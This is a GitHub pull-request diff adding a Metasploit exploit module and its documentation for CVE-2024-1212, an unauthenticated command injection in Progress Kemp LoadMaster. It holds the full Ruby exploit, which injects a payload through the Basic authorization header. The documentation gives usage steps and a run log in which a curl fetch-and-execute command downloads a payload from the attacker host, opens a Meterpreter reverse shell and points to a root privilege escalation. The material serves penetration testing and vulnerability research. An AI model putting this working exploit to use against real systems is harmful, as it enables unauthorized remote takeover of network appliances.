Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Progress LoadMaster unauthenticated command injection module CVE-2024-1212 #18972

Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,97 @@
## Vulnerable Application
CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection

For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212

A trial VM which the exploit should work against out of the box can be downloaded from:
https://sso.kemptechnologies.com/register/kemp/vlm

The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw

## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
1. Do: `set RHOSTS <target loadmaster>`
1. Do: `set RPORT <port loadmaster is running on>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `bal` user.
1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges.
1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module.

## Scenarios

### LoadMaster 7.2.59.0.22007

``` msf
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options

Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.134.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
asploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path to LoadMaster
VHOST no HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME GyzwtIbxq no Name to use on remote system when storing payload; cannot contain spaces or slash
es
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp/ yes Remote writable dir to store payload; cannot contain spaces
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run

[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.134.141:443 is vulnerable...
[+] The target is vulnerable.
[*] Sending payload...
[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.141 (curl/7.77.0)
[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500

meterpreter > sysinfo
Computer : 10.5.134.141
OS : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: bal
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,133 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def flag_file
return @flag_file unless @flag_file.nil?

@flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)
end

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in
Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.
The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and
7.2.48.10 (LTS).
},
'Author' => [
'Dave Yesland with Rhino Security Labs',
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-1212'],
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
['URL', 'https://kemptechnologies.com/kemp-load-balancers']
],
'DisclosureDate' => '2024-03-19',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [ REPEATABLE_SESSION ]
},
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
[
'Automatic', # Add logic to run the payload only once
{
'Payload' => {
'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",
'Append' => ')',
'BadChars' => "\x3a\x27"
}
}
],
[
'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions
{
'Payload' => {
'BadChars' => "\x3a\x27"
}
}
]
],
'Default_target' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_WRITABLE_DIR' => '/tmp/',
'SSL' => true,
'RPORT' => 443
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])
])
end

def exploit
uri = normalize_uri(target_uri.path, 'access', 'set')

vprint_status('Sending payload...')

send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'param' => 'enableapi',
'value' => '1'
},
'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),
'verify' => false
})
end

def on_new_session(client)
super
print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')
end

def check
print_status("Checking if #{peer} is vulnerable...")

uri = normalize_uri(target_uri.path, 'access', 'set')

res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'param' => 'enableapi',
'value' => '1'
},
'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),
'verify' => false
})

# No response from server
unless res
return CheckCode::Unknown
end

# Check for specific error pattern in headers or body to confirm vulnerability
if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
end

end
Loading